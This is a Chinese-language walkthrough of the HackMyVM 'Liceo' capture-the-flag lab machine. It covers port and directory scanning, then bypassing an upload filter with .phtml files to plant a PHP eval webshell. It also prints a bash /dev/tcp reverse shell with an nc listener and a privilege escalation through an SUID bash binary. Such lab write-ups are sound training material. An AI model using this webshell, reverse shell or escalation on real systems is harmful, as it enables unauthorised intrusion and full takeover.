liceo-hackmyvm
靶机地址：https://hackmyvm.eu/machines/machine.php?vm=Liceo
本机环境：NAT模式下，使用VirtualBox

信息收集：

首先局域网内探测靶机IP
发现IP为10.0.2.4

开启nmap扫描一下看看开了什么端口
扫描期间看一下web页面
这里发现web中并无什么可用的信息

这时端口也扫完了，这俩发现ftp可以进行一个匿名登录

登录进入发现这里并无什么有用信息就不截图了，这是简单扫一下目录

dirsearch -u http://10.0.2.4

漏洞利用

这里扫描完发现有两个目录
uploads,upload.php
直接访问，发现可以上传文件，直接上传一个php一句话木马，发现不允许上传php后缀的

<?php phpinfo(); @eval($_POST['shell']); ?>

此时进行一个黑名单绕过

这里上传一个php5后缀的文件，访问uploads目录发现文件不解析

此时选择更改后缀名
更改为phtml或phar等都是可以的
解析成功

我这里用的是蚁剑连接的


进入home发现第一个flag

提权

这里查一下suid

find / -perm -u=s -type f 2>/dev/null

发现 bash 有 suid，利用一下：
这里先将蚁剑上的shell弹到kali终端

nc -lvnp 1234			# kali 开启nc监听
蚁剑
bash -c 'exec bash -i &>/dev/tcp/10.0.2.4/1234 <&1'

连接成功

/usr/bin/bash -p

提权成功

拿到flag